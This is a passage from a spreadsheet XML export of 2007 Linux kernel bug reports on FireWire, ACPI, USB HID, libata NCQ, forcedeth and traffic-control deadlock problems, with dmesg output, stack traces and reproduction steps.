ata_piix ata_generic libata sd_mod scsi_mod ext3 jbd mbcache ehci_hcd ohci_hcd uhci_hcd [&lt;d09ef90a&gt;] usb_serial_probe+0x97b/0xdd1 [usbserial] [&lt;c0569258&gt;] usb_resume_both+0xa1/0xb7 [&lt;c056940c&gt;] usb_autopm_do_device+0xb3/0xbd [&lt;c0568f62&gt;] usb_match_one_id+0x1c/0x71 [&lt;c0569cbd&gt;] usb_probe_interface+0x81/0xb2 [&lt;c05697ec&gt;] usb_register_driver+0x6d/0xd4 [&lt;d09ee7b5&gt;] usb_serial_register+0x1ed/0x1f6 [usbserial] Steps to reproduce: plug in lirc-serial device tira. boot stock or vanilla kernel. check dmesg.</t>
  </si>
  <si>
    <t>Ethernet over firewire 4pin&lt;-&gt;4pin cable crashes in high traffic!!</t>
  </si>
  <si>
    <t>2.6.22.2</t>
  </si>
  <si>
    <t>2007-07-02 09:43 UTC</t>
  </si>
  <si>
    <t>2007-10-11 10:15 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown Distribution: Debian testing Hardware Environment: OHCI Firewire cards connected via 4pin &lt;-&gt; 4pin cable Software Environment: 2.6.21.5 --------------------- Problem Description: 1st. laptop: 02:00.4 FireWire (IEEE 1394): ALi Corporation M5253 P1394 OHCI 1.1 Controller eth1 Zapouzdření:NEZNÁM HWadr 00-90-E6-00-00-00-24-F7-00-00-00-00-00-00-00-00 inet adr:10.0.0.72 Všesměr:10.0.0.255 Maska:255.255.255.0 AKTIVOVÁNO VŠESMĚROVÉ_VYSÍLÁNÍ BĚŽÍ MULTICAST MTU:1500 Metrika:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:90 errors:0 dropped:0 overruns:0 carrier:0 kolizí:0 délka odchozí fronty:1000 RX bytes:0 (0.0 b) TX bytes:3240 (3.1 KiB) ieee1394: Node added: ID:BUS[0-00:1023] GUID[00030d002558ad3d] ieee1394: Node changed: 0-01:1023 -&gt; 0-00:1023 ieee1394: Node suspended: ID:BUS[0-00:1023] GUID[00030d002558ad3d] ieee1394: Node changed: 0-00:1023 -&gt; 0-01:1023 ieee1394: Node resumed: ID:BUS[0-01:1023] GUID[00030d002558ad3d] ieee1394: Node suspended: ID:BUS[0-01:1023] GUID[00030d002558ad3d] ieee1394: Node resumed: ID:BUS[0-01:1023] GUID[00030d002558ad3d] ieee1394: raw1394: /dev/raw1394 device initialized ieee1394: Node suspended: ID:BUS[0-01:1023] GUID[00030d002558ad3d] ieee1394: Node resumed: ID:BUS[0-01:1023] GUID[00030d002558ad3d] ieee1394: Node suspended: ID:BUS[0-01:1023] GUID[00030d002558ad3d] notas:/home/cijoml# ssh 10.0.0.2 ssh: connect to host 10.0.0.2 port 22: No route to host --------- 2nd. laptop: 02:09.0 FireWire (IEEE 1394): Texas Instruments TSB43AB22/A IEEE-1394a-2000 Controller (PHY/Link) eth1 Zapouzdření:NEZNÁM HWadr 00-03-0D-00-25-58-AD-3D-00-00-00-00-00-00-00-00 inet adr:10.0.0.2 Všesměr:10.0.0.255 Maska:255.255.255.0 AKTIVOVÁNO VŠESMĚROVÉ_VYSÍLÁNÍ BĚŽÍ MULTICAST MTU:1500 Metrika:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:41 errors:0 dropped:0 overruns:0 carrier:0 kolizí:0 délka odchozí fronty:1000 RX bytes:0 (0.0 b) TX bytes:5412 (5.2 KiB) ieee1394: Node suspended: ID:BUS[0-01:1023] GUID[0090e600000024f7] ieee1394: Node changed: 0-01:1023 -&gt; 0-00:1023 ieee1394: Node resumed: ID:BUS[0-00:1023] GUID[0090e600000024f7] ieee1394: Node changed: 0-00:1023 -&gt; 0-01:1023 ieee1394: Node changed: 0-01:1023 -&gt; 0-00:1023 ieee1394: Node suspended: ID:BUS[0-00:1023] GUID[0090e600000024f7] ieee1394: Node resumed: ID:BUS[0-00:1023] GUID[0090e600000024f7] ieee1394: Node changed: 0-00:1023 -&gt; 0-01:1023 ieee1394: raw1394: /dev/raw1394 device initialized ieee1394: Node changed: 0-01:1023 -&gt; 0-00:1023 ieee1394: Node suspended: ID:BUS[0-00:1023] GUID[0090e600000024f7] ieee1394: Node resumed: ID:BUS[0-00:1023] GUID[0090e600000024f7] ieee1394: Node changed: 0-00:1023 -&gt; 0-01:1023 ieee1394: Node changed: 0-01:1023 -&gt; 0-00:1023 ieee1394: Node suspended: ID:BUS[0-00:1023] GUID[0090e600000024f7] Listik:~# ssh 10.0.0.72 ssh: connect to host 10.0.0.72 port 22: No route to host --------------------------- Steps to reproduce: connect, setup, check</t>
  </si>
  <si>
    <t>general protection fault: 0000 [1] PREEMPT SMP</t>
  </si>
  <si>
    <t>2007-07-03 00:13 UTC</t>
  </si>
  <si>
    <t>2008-07-28 13:21 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown Distribution: Debian Etch Hardware Environment: x84_64, Dell Optiplex GX620 Software Environment: Debian Etch, 2.6.21.5 Problem Description: general protection fault: 0000 [1] PREEMPT SMP CPU 0 Modules linked in: dvb_usb_dtt200u dvb_usb dvb_core dvb_pll nls_ascii vfat fat usb_storage i915 drm lp fuse eeprom loop snd_intel8x0 rng_core snd_ac97_codec iTCO_wdt iTCO_vendor_support ac97_bus snd_pcm snd_timer snd soundcore pcspkr i2c_i801 floppy ehci_hcd uhci_hcd snd_page_alloc parport_pc parport rtc tg3 Pid: 1955, comm: find Not tainted 2.6.21.5 #1 RIP: 0010:[&lt;ffffffff8020d343&gt;] [&lt;ffffffff8020d343&gt;] vfs_getattr+0x12/0x31 RSP: 0018:ffff81000a707e38 EFLAGS: 00010292 RAX: 6c0100006db3ffff RBX: 0000000000000000 RCX: ffff810001fd0280 RDX: ffff81000a707ef8 RSI: ffff8100120ea250 RDI: ffff81000ffe2120 RBP: ffff81000a707ef8 R08: ffff810001fd0280 R09: 0000000000000000 R10: 0000000000001000 R11: ffffffff80210708 R12: 000000000052e0e0 R13: 000000000052e0f3 R14: 0000000000000000 R15: 00007fff6aa6a470 FS: 00002ae4403916d0(0000) GS:ffffffff80509000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b CR2: 0000000000562000 CR3: 000000003eb5e000 CR4: 00000000000006e0 Process find (pid: 1955, threadinfo ffff81000a706000, task ffff81003f61e040) Stack: 000000000052e0f3 ffffffff80239e9f ffff8100120ea250 ffff810001fd0280 0000000000000001 00000000000081a4 0000000100000000 0000000000000000 000000000000001b 0000000000001000 0000000000000008 000000004656d677 Call Trace: [&lt;ffffffff80239e9f&gt;] vfs_lstat_fd+0x2f/0x47 [&lt;ffffffff80226e41&gt;] sys_newlstat+0x19/0x31 [&lt;ffffffff80254f9e&gt;] system_call+0x7e/0x83 Code: 48 8b 40 78 48 85 c0 74 0a 48 89 cf 49 89 c3 59 41 ff e3 48 RIP [&lt;ffffffff8020d343&gt;] vfs_getattr+0x12/0x31 RSP &lt;ffff81000a707e38&gt; Steps to reproduce: unknown</t>
  </si>
  <si>
    <t>regression: EmbeddedControl AE_TIME errors, /proc/acpi/battery/* not present</t>
  </si>
  <si>
    <t>2.6.22-rc7</t>
  </si>
  <si>
    <t>2007-07-03 01:39 UTC</t>
  </si>
  <si>
    <t>Piotr Keplicz</t>
  </si>
  <si>
    <t>2008-10-17 21:36 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Battery and other ACPI-related features used to work in 2.6.20 Distribution: Ubuntu (7.04 with 2.6.20 - works, alpha 7.10 with 2.6.22-rc - does not work) Hardware Environment: ASUS M6r Problem Description: 2.6.22-rc kernels are unable to check battery status. The following errors show up in dmesg at boot: ACPI: EC: acpi_ec_wait timeout, status = 255, expect_event = 2 ACPI: EC: input buffer is not empty, aborting transaction ACPI Exception (evregion-0420): AE_TIME, Returned by Handler for [EmbeddedControl] [20070126] ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.SBRG.EC0_.RDC3] (Node ddf07f04), AE_TIME ACPI Error (psparse-0537): Method parse/execution failed [\ECIO] (Node ddf0975c), AE_TIME ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.SBRG.EC0_.ACPS] (Node ddf07f68), AE_TIME ACPI Error (psparse-0537): Method parse/execution failed [\ACPS] (Node ddf04c70), AE_TIME ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.AC0_._PSR] (Node ddf07b80), AE_TIME ACPI Exception (ac-0095): AE_TIME, Error reading AC Adapter state [20070126] ACPI: EC: acpi_ec_wait timeout, status = 255, expect_event = 2 ACPI: EC: input buffer is not empty, aborting transaction ACPI Exception (evregion-0420): AE_TIME, Returned by Handler for [EmbeddedControl] [20070126] ACPI Exception (dswexec-0462): AE_TIME, While resolving operands for [OpcodeName unavailable] [20070126] ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.SBRG.EC0_.SMBR] (Node ddf07d24), AE_TIME ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.SBRG.EC0_.BIF0] (Node ddf07900), AE_TIME ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.BAT0._BIF] (Node ddf07a2c), AE_TIME ACPI Exception (battery-0147): AE_TIME, Evaluating _BIF [20070126] This laptop experienced EC problems before (described in bug 4150 and bug 6111).</t>
  </si>
  <si>
    <t>Hercules USB HID controller button events repeat too quickly</t>
  </si>
  <si>
    <t>2007-07-05 10:17 UTC</t>
  </si>
  <si>
    <t>Albert Santoni</t>
  </si>
  <si>
    <t>2007-10-21 11:57 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.18 (Ubuntu 6.10) Distribution: Ubuntu 7.04 Hardware Environment: Intel x86 Software Environment: Mixxx Problem Description: The Hercules DJ Console used to have a delay after button presses, but now it fires off press events very rapidly without any delay. (This screws up a lot of software that uses it.) The buttons are handled as a USB HID v1.10 keyboard, as seen in dmesg: input: USB HID v1.10 Keyboard [Hercules Hercules DJ Console] on usb-0000:00:02.2-1 According to the "API Changes in the 2.6 kernel series" webpage [1], 2.6.20 introduced "a generic layer for human input devices; the USB HID code has been switched over to this new layer." - I believe this change has caused the problem. To reiterate, the problem is that button presses fire off too quickly now - A single touch of a button on the controller is often received as two button presses. This wasn't a problem in earlier kernels, and if it's not fixed, applications that support the controller are all going to have to change their behaviour to work around the rapid-fire events. Steps to reproduce: 1) Install Mixxx 1.5.0 ( http://mixxx.sf.net) or install in Ubuntu 7.04 through apt-get. 2) Run "chmod a+rw /dev/input/event*" to let Mixxx access the Hercules device. 3) Launch mixxx by running "mixxx" 4) Load a song and push the "play/pause" button on the Hercules controller. It'll start and stop the song really quickly because your button push fired off two events really quickly. Try pushing the button quicker, and you can sometimes manage to only make it fire off one event. There should be a key-repeat delay on those buttons... (There was in earlier kernels.) Thanks! [1] http://lwn.net/Articles/2.6-kernel-api/</t>
  </si>
  <si>
    <t>trace dump: "kobject_add failed for audio with -EEXIST, ..."</t>
  </si>
  <si>
    <t>2.6.21.5 + patch suspend2-2.2.10</t>
  </si>
  <si>
    <t>2007-07-07 07:58 UTC</t>
  </si>
  <si>
    <t>2009-03-23 11:14 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: dunno - jumped from 2.4.34.5 to 2.6.21.5 Distribution: Debian 3.1 Hardware Environment: pc Software Environment: Linux 2.6.21.5 + patch suspend2-2.2.10 Problem Description: trace dump loading module snd-pcm-oss Steps to reproduce: load the module here's the dmesg dump: Software Watchdog Timer: 0.07 initialized. soft_noboot=0 soft_margin=60 sec (nowayout= 0) Device driver i2c-9191 lacks bus and class support for being resumed. PCI driver via686a lacks driver specific resume support. input: Power Button (FF) as /class/input/input3 ACPI: Power Button (FF) [PWRF] input: Power Button (CM) as /class/input/input4 ACPI: Power Button (CM) [PWRB] i2c /dev entries driver Device driver i2c-0 lacks bus and class support for being resumed. PCI driver vt596_smbus lacks driver specific resume support. it87: Found IT8712F chip at 0x290, revision 5 Capability LSM initialized kobject_add failed for audio with -EEXIST, don't try to register things with the same name in the same directory. [&lt;c01f5016&gt;] kobject_shadow_add+0x86/0x130 [&lt;c027001d&gt;] device_add+0x9d/0x570 [&lt;c027086e&gt;] device_create+0x8e/0xc0 [&lt;f881c1ac&gt;] sound_insert_unit+0xcc/0x110 [soundcore] [&lt;f881c2e9&gt;] register_sound_special_device+0x79/0x140 [soundcore] [&lt;f88e332d&gt;] snd_register_oss_device+0xed/0x180 [snd] [&lt;f8b6d8ef&gt;] register_oss_dsp+0x5f/0xa0 [snd_pcm_oss] [&lt;c01f47eb&gt;] idr_get_new_above_int+0x6b/0x130 [&lt;c01f48ea&gt;] idr_get_new+0xa/0x30 [&lt;c01a988d&gt;] get_inode_number+0x3d/0x80 [&lt;c01aa0c2&gt;] create_proc_entry+0x72/0xb0 [&lt;f88e0595&gt;] snd_info_register+0x85/0xb0 [snd] [&lt;f8b6d838&gt;] snd_pcm_oss_proc_init+0x78/0x90 [snd_pcm_oss] [&lt;f8b6d9b9&gt;] snd_pcm_oss_register_minor+0x89/0x100 [snd_pcm_oss] [&lt;c013f0c2&gt;] load_module+0xa82/0xcf0 [&lt;c03337c4&gt;] __mutex_lock_slowpath+0x174/0x220 [&lt;f892d6f7&gt;] snd_pcm_notify+0xa7/0xc0 [snd_pcm] [&lt;f8874030&gt;] alsa_pcm_oss_init+0x30/0x82 [snd_pcm_oss] [&lt;c013f425&gt;] sys_init_module+0xd5/0x140 [&lt;c01041b0&gt;] syscall_call+0x7/0xb ======================= usbcore: registered new interface driver usbkbd USB driver usbkbd lacks resume support. drivers/usb/input/usbkbd.c: :USB HID Boot Protocol keyboard driver usbcore: registered new interface driver usbmouse lspci: 0000:00:00.0 Host bridge: VIA Technologies, Inc. VT8377 [KT400/KT600 AGP] Host Bridge (rev 80) 0000:00:01.0 PCI bridge: VIA Technologies, Inc. VT8237 PCI Bridge 0000:00:10.0 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) 0000:00:10.1 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) 0000:00:10.2 USB Controller: VIA Technologies, Inc. VT82xxxxx UHCI USB 1.1 Controller (rev 80) 0000:00:10.3 USB Controller: VIA Technologies, Inc. USB 2.0 (rev 82) 0000:00:11.0 ISA bridge: VIA Technologies, Inc. VT8235 ISA Bridge 0000:00:11.1 IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/C PIPC Bus Master IDE (rev 06) 0000:00:11.5 Multimedia audio controller: VIA Technologies, Inc. VT8233/A/8235/8237 AC97 Audio Controller (rev 50) 0000:00:12.0 Ethernet controller: VIA Technologies, Inc. VT6102 [Rhine-II] (rev 74) 0000:01:00.0 VGA compatible controller: ATI Technologies Inc RV280 [Radeon 9200 SE] (rev 01) 0000:01:00.1 Display controller: ATI Technologies Inc RV280 [Radeon 9200 SE] (Secondary) (rev 01) dmidecode: BIOS Information Vendor: Award Software, Inc. Version: ASUS A7V8X-X ACPI BIOS Revision 1008 Release Date: 12/29/2003 got same trace on another pc with same MB, so I think hw failure can be reasonably excluded. thanks -- paolo</t>
  </si>
  <si>
    <t>Kernel reboots when booted with APIC enabled on an asus a7v8x-x motherboard</t>
  </si>
  <si>
    <t>2007-07-08 14:24 UTC</t>
  </si>
  <si>
    <t>warm blooded creature</t>
  </si>
  <si>
    <t>2007-11-27 05:02 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Ubuntu 7.04 Hardware Environment: Motherboard is an Asus A7V8X-X with the latest available BIOS installed. CPU is an Athlon XP 1800+ Software Environment: Problem Description: When I try booting a distribution like Ubuntu 7.04 while APIC enabled in my BIOS, linux just reboots when I try to boot it. If I turn off APIC either in my bios or by using the "noapic" boot command line option, linux boots normally. Steps to reproduce: 1. Enable APIC in the BIOS (which seems to be turned on by default in my bios whenever I reset it back to its defaults) 2. Attempt to boot a kernel with APIC enabled. A bunch of lines from the kernel outputs for a second or so (that I can't read fast enough before the reboot) then my system reboots.</t>
  </si>
  <si>
    <t>Unaligned acess in udp_recvmsg() on EV56</t>
  </si>
  <si>
    <t>2.6.22-rc7-git7</t>
  </si>
  <si>
    <t>2007-07-08 14:34 UTC</t>
  </si>
  <si>
    <t>Dustin Marquess</t>
  </si>
  <si>
    <t>2008-09-23 05:33 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Occurs in all 2.6.2[12] at least Distribution: Debian testing/lenny Hardware Environment: Digital PWS 433au (EV56) Software Environment: Linux utopia 2.6.22-rc7-git7 #1 Thu Jul 8 10:34:17 CDT 2027 alpha GNU/Linux Gnu C 4.2.1 Gnu make 3.81 binutils (GNU Binutils for Debian) 2.17.50.20070426 util-linux 2.12r mount 2.12r module-init-tools 3.3-pre11 e2fsprogs 1.40-WIP xfsprogs 2.8.18 Linux C Library &gt; libc.2.5 Dynamic linker (ldd) 2.5 Procps 3.2.7 Net-tools 1.60 Kbd 85: Sh-utils 5.97 udev 105 Modules Loaded ipt_TOS xt_multiport xt_tcpudp xt_state ip6table_mangle ip6table_filter ip6_tables ipv6 iptable_nat nf_nat nf_conntrack_ipv4 nf_conntrack iptable_mangle iptable_filter ip_tables x_tables dm_mod serio_raw mxser_new ide_generic via_rhine mii generic ide_core tulip bitrev crc32 sg sr_mod cdrom raid1 md_mod loop Problem Description: kernel unaligned acc : 2248 (pc=fffffc0000583de4,va=fffffc00071c382a) fffffc0000583bc0 T udp_recvmsg fffffc0000583ed0 T udp_destroy_sock kernel unaligned acc : 1231 (pc=fffffc0000585190,va=fffffc000795e02e) fffffc0000585120 T __udp4_lib_rcv fffffc0000585bf0 T udp_rcv This problem does NOT seem to affect my Tsunami/Shark (EV68AL) box running the same kernel version on the same LAN. Not sure if it's CPU generation related (EV5 vs EV6), or if it's the NIC (via_rhine on the EV5 vs e100 on the EV6). Steps to reproduce: According to tshark, the only UDP packets are DHCP packets: 1815064200.131003 10.5.128.1 -&gt; 255.255.255.255 DHCP DHCP Offer - Transaction ID 0x27c6</t>
  </si>
  <si>
    <t>MSG_TRUNC not regarded in unix_dgram_recvmsg()</t>
  </si>
  <si>
    <t>2007-07-09 04:06 UTC</t>
  </si>
  <si>
    <t>Daniel</t>
  </si>
  <si>
    <t>2008-09-23 09:56 UTC</t>
  </si>
  <si>
    <t>Problem Description: In unix_dgram_recvmsg() in af_unix.c the flag MSG_TRUNC is not regarded as described in the recv(2) man page. This did work in older kernels (I have a working 2.6.13, but am not sure if that is a plain kernel.org one, nor if it was the last working revision). I believe the bug was introduced when the variable "copied" was removed from the code. IMHO, the line 1650: err = size; should read err = (flags &amp; MSG_TRUNC) ? skb-&gt;len : size;</t>
  </si>
  <si>
    <t>spurious completions during NCQ</t>
  </si>
  <si>
    <t>2007-07-09 23:29 UTC</t>
  </si>
  <si>
    <t>Serge van Thillo</t>
  </si>
  <si>
    <t>2007-07-09 23:38 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.21.5 Distribution: LFS Hardware Environment: Thinkpad R60 Software Environment: Problem Description: In the system log file I noticed the following sequences ----- Jul 9 11:38:07 localhost kernel: ata1.00: exception Emask 0x2 SAct 0x7ffffff8 SErr 0x0 action 0x2 frozen Jul 9 11:38:07 localhost kernel: ata1.00: (spurious completions during NCQ issue=0x0 SAct=0x7ffffff8 FIS=004040a1:00000004) Jul 9 11:38:07 localhost kernel: ata1.00: cmd 61/08:18:6f:c3:58/00:00:00:00:00/40 tag 3 cdb 0x0 data 4096 out Jul 9 11:38:07 localhost kernel: res 40/00:f0:47:c4:58/00:00:00:00:00/40 Emask 0x2 (HSM violation) . . Jul 9 11:38:07 localhost kernel: ata1.00: cmd 61/08:f0:47:c4:58/00:00:00:00:00/40 tag 30 cdb 0x0 data 4096 out Jul 9 11:38:07 localhost kernel: res 40/00:f0:47:c4:58/00:00:00:00:00/40 Emask 0x2 (HSM violation) Jul 9 11:38:07 localhost kernel: ata1: soft resetting port Jul 9 11:38:07 localhost kernel: ata1: SATA link up 1.5 Gbps (SStatus 113 SControl 300) Jul 9 11:38:07 localhost kernel: ata1.00: configured for UDMA/100 Jul 9 11:38:07 localhost kernel: ata1: EH complete Jul 9 11:38:07 localhost kernel: SCSI device sda: 156301488 512-byte hdwr sectors (80026 MB) Jul 9 11:38:07 localhost kernel: sda: Write Protect is off Jul 9 11:38:07 localhost kernel: SCSI device sda: write cache: enabled, read cache: enabled, doesn't support DPO or FUA ----- The harddisk that is in my laptop is : ATA device, with non-removable media Model Number: FUJITSU MHV2080BH Serial Number: NW05T6827L0T Firmware Revision: 00840028 Which I included in the ncq blacklist in libata-core.c. This doesn't show the error anymore, and I don't notice any speed differences. What I do not know if this harddrive has the same problem as hitachi drives that I see a lot more about when I search for th the above error. Steps to reproduce: irregular. (Downloading-, Copying files)</t>
  </si>
  <si>
    <t>(net forcedeth) stuck in long loop on loading</t>
  </si>
  <si>
    <t>2007-07-10 16:29 UTC</t>
  </si>
  <si>
    <t>Alex Krohn</t>
  </si>
  <si>
    <t>2007-11-30 14:38 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.19.7 Distribution: Gentoo Hardware Environment: Tyan S2192 Motherboard, Dual Opteron 2212 Procs Software Environment: Problem Description: Hi, I'm unable to booth with any of 2.6.22, 2.6.21.5 or 2.6.20.15. The boot always hangs immediately after: forcedeth: using HIGHDMA I tracked this down to it stuck in the following loop: for (i = 0; i &lt; 5000; i++) { msleep(1); if (nv_mgmt_acquire_sema(dev)) { /* management unit setup the phy already? */ // snip -- we never get in here, always timeout waiting on semaphore. } } So upon loading, the kernel gets stuck in this loop (5,000 iterations of up to 5 seconds each as the sema lock has a 5 second check in it). If we boot with 2.6.19.7, the driver loads properly. Also an ubunutu live cd with 2.6.20 loads properly, so it looks like either distros have applied a patch, or I have something wrong in my .config that is preventing it from working (I've tried a stock config with just enabling forcedeth, and same problem). The diff between 2.6.19.7 and 2.6.20 seems quite big, so I'm not sure which patch to look at further. You can see my current .config and lspci output here: http://marc.info/?l=linux-netdev&amp;m=118405700327004&amp;w=2 Any help or pointers would be much appreciated. Thanks! Alex</t>
  </si>
  <si>
    <t>BUG: scheduling while atomic</t>
  </si>
  <si>
    <t>Todays linux-2.6 git pull (2.6.22+)</t>
  </si>
  <si>
    <t>2007-07-11 05:20 UTC</t>
  </si>
  <si>
    <t>Gregor Jasny</t>
  </si>
  <si>
    <t>2007-07-19 00:41 UTC</t>
  </si>
  <si>
    <t>Hi, today I tried the new Juju Firewire stack on my MacMini. The whole Linux system is located on the external fw-disk. During boot I see the following bug. Afterward the driver works fine. firewire_core: created new fw device fw0 (0 config rom retries, S400) scsi6 : SBP-2 IEEE-1394 firewire_core: created new fw device fw1 (0 config rom retries, S400) firewire_core: phy config: card 0, new root=ffc1, gap_count=5 firewire_ohci: context_stop: still active (0x00000411) BUG: scheduling while atomic: events/0/0x00000100/7 [&lt;c036096d&gt;] __sched_text_start+0x4dd/0x690 [&lt;c0124aa2&gt;] __mod_timer+0x92/0xb0 [&lt;c03612bb&gt;] schedule_timeout+0x4b/0xd0 [&lt;c0124820&gt;] process_timeout+0x0/0x10 [&lt;c0124ad5&gt;] msleep+0x15/0x20 [&lt;c02a4e7f&gt;] context_stop+0x5f/0x70 [&lt;c02a678b&gt;] bus_reset_tasklet+0xfb/0x1c0 [&lt;c01215b2&gt;] tasklet_action+0x42/0xa0 [&lt;c01211f2&gt;] __do_softirq+0x82/0x100 [&lt;c01212a7&gt;] do_softirq+0x37/0x40 [&lt;c0105330&gt;] do_IRQ+0x40/0x80 [&lt;c0105330&gt;] do_IRQ+0x40/0x80 [&lt;c010342b&gt;] common_interrupt+0x23/0x28 [&lt;c0362445&gt;] _spin_unlock_irqrestore+0x5/0x10 [&lt;c02a5d9e&gt;] at_context_transmit+0x2be/0x450 [&lt;c01249e8&gt;] try_to_del_timer_sync+0x48/0x50 [&lt;c03612c2&gt;] schedule_timeout+0x52/0xd0 [&lt;c0124967&gt;] lock_timer_base+0x27/0x60 [&lt;c0124aa2&gt;] __mod_timer+0x92/0xb0 [&lt;c02a2394&gt;] fw_send_request+0x194/0x1f0 [&lt;c02a08a5&gt;] fw_card_bm_work+0x2a5/0x320 [&lt;c02a7030&gt;] complete_transaction+0x0/0x70 [&lt;c02a720a&gt;] sbp2_send_orb+0xca/0xe0 [&lt;c02a7030&gt;] complete_transaction+0x0/0x70 [&lt;c02a741e&gt;] sbp2_send_management_orb+0xfe/0x230 [&lt;c02a7980&gt;] sbp2_login+0x60/0x1d0 [&lt;c02a7920&gt;] sbp2_login+0x0/0x1d0 [&lt;c012af33&gt;] run_workqueue+0x73/0x100 [&lt;c012e640&gt;] autoremove_wake_function+0x0/0x50 [&lt;c012b85c&gt;] worker_thread+0x9c/0x100 [&lt;c012e640&gt;] autoremove_wake_function+0x0/0x50 [&lt;c012b7c0&gt;] worker_thread+0x0/0x100 [&lt;c012e362&gt;] kthread+0x42/0x70 [&lt;c012e320&gt;] kthread+0x0/0x70 [&lt;c010362b&gt;] kernel_thread_helper+0x7/0x1c ======================= firewire_sbp2: management write failed, rcode 0x12 Initializing USB Mass Storage driver... firewire_sbp2: logged in to sbp2 unit fw1.0 (0 retries) firewire_sbp2: - management_agent_address: 0xfffff0030000 firewire_sbp2: - command_block_agent_address: 0xfffff0100000 firewire_sbp2: - status write address: 0x000100000000 scsi 6:0:0:0: Direct-Access-RBC SAMSUNG SP2514N VF10 PQ: 0 ANSI: 4 The kernel version is todays linux-2.6 pull. If you need more information, please contact me. Thanks, Gregor</t>
  </si>
  <si>
    <t>New TC deadlock scenario</t>
  </si>
  <si>
    <t>2007-07-11 08:49 UTC</t>
  </si>
  <si>
    <t>2008-09-26 04:58 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Hardware Environment: Software Environment: Problem Description: Here is another scenario I bumped onto - qdisc_watchdog_cancel() and qdisc_restart() deadlock. CPU#0 qdisc_watchdog() fires and gets dev-&gt;queue_lock qdisc_run()...qdisc_restart()... -&gt; releases dev-&gt;queue_lock and enters dev_hard_start_xmit() CPU#1 tc del qdisc dev ... qdisc_graft()...dev_graft_qdisc()...dev_deactivate()... -&gt; grabs dev-&gt;queue_lock ... qdisc_reset()...{cbq,hfsc,htb,netem,tbf}_reset()...qdisc_watchdog_cancel()... -&gt; hrtimer_cancel() - waiting for the qdisc_watchdog() to exit, while still holding dev-&gt;queue_lock CPU#0 dev_hard_start_xmit() returns ... -&gt; wants to get dev-&gt;queue_lock(!) DEADLOCK! I did not manage to get a backtrace on qdisc_watchdog stack to show them both but nevertheless - the above looks like the only way qdisc_watchdog_cancel could be sitting there. Regards, Ranko ---cut--- SysRq : Show Regs Pid: 12790, comm: tc EIP: 0060:[&lt;c02f13f9&gt;] CPU: 1 EIP is at _spin_unlock_irqrestore+0x36/0x39 EFLAGS: 00000282 Not tainted (2.6.22.SNET.Thors.htbpatch.6.lockdebug #1) EAX: 00000000 EBX: c1d119c0 ECX: 00000000 EDX: 00000000 ESI: 00000282 EDI: c1d11a18 EBP: 00000000 DS: 007b ES: 007b FS: 00d8 CR0: 80050033 CR2: 008ba828 CR3: 20dc2000 CR4: 000006d0 [&lt;c0132ff4&gt;] hrtimer_try_to_cancel+0x33/0x66 [&lt;c013007b&gt;] kthread+0xf/0x57 [&lt;c0133035&gt;] hrtimer_cancel+0xe/0x14 [&lt;c029daaf&gt;] qdisc_watchdog_cancel+0x8/0x11 [&lt;f8b8541d&gt;] htb_reset+0x9c/0x14b [sch_htb] [&lt;c029c2ad&gt;] qdisc_reset+0x10/0x11 [&lt;c029c3e7&gt;] dev_deactivate+0x27/0xa5 [&lt;c029d7a6&gt;] dev_graft_qdisc+0x81/0xa5 [&lt;c029d7f2&gt;] qdisc_graft+0x28/0x88 [&lt;c029df93&gt;] tc_get_qdisc+0x15d/0x1e9 [&lt;c029de36&gt;] tc_get_qdisc+0x0/0x1e9 [&lt;c0297038&gt;] rtnetlink_rcv_msg+0x1c2/0x1f5 [&lt;c02a1834&gt;] netlink_run_queue+0x96/0xfd [&lt;c0296e76&gt;] rtnetlink_rcv_msg+0x0/0x1f5 [&lt;c0296e28&gt;] rtnetlink_rcv+0x26/0x42 [&lt;c02a1d5c&gt;] netlink_data_ready+0x12/0x54 [&lt;c02a0abe&gt;] netlink_sendskb+0x1c/0x33 [&lt;c02a1c6b&gt;] netlink_sendmsg+0x1f3/0x2d2 [&lt;c0284d06&gt;] sock_sendmsg+0xe2/0xfd [&lt;c013030d&gt;] autoremove_wake_function+0x0/0x37 [&lt;c013030d&gt;] autoremove_wake_function+0x0/0x37 [&lt;c01d79c3&gt;] copy_from_user+0x2d/0x59 [&lt;c0284e4e&gt;] sys_sendmsg+0x12d/0x243 [&lt;c02f12fd&gt;] _read_unlock_irq+0x20/0x23 [&lt;c013a49e&gt;] trace_hardirqs_on+0xac/0x149 [&lt;c0148c78&gt;] find_get_page+0x11/0x49 [&lt;c015585e&gt;] __handle_mm_fault+0x19d/0x947 [&lt;c02f0f87&gt;] _spin_unlock+0x14/0x1c [&lt;c01558e5&gt;] __handle_mm_fault+0x224/0x947 [&lt;c028608a&gt;] sys_socketcall+0x24f/0x271 [&lt;c0103370&gt;] restore_nocheck+0x12/0x15 [&lt;c010329e&gt;] sysenter_past_esp+0x5f/0x99 ======================= ---cut--- Steps to reproduce:</t>
  </si>
  <si>
    <t>CD-ROM cannot be powered off after one suspend/resume cycle - Clevo M55xN Laptop</t>
  </si>
  <si>
    <t>2.6.22 (and before)</t>
  </si>
  <si>
    <t>2007-07-12 00:10 UTC</t>
  </si>
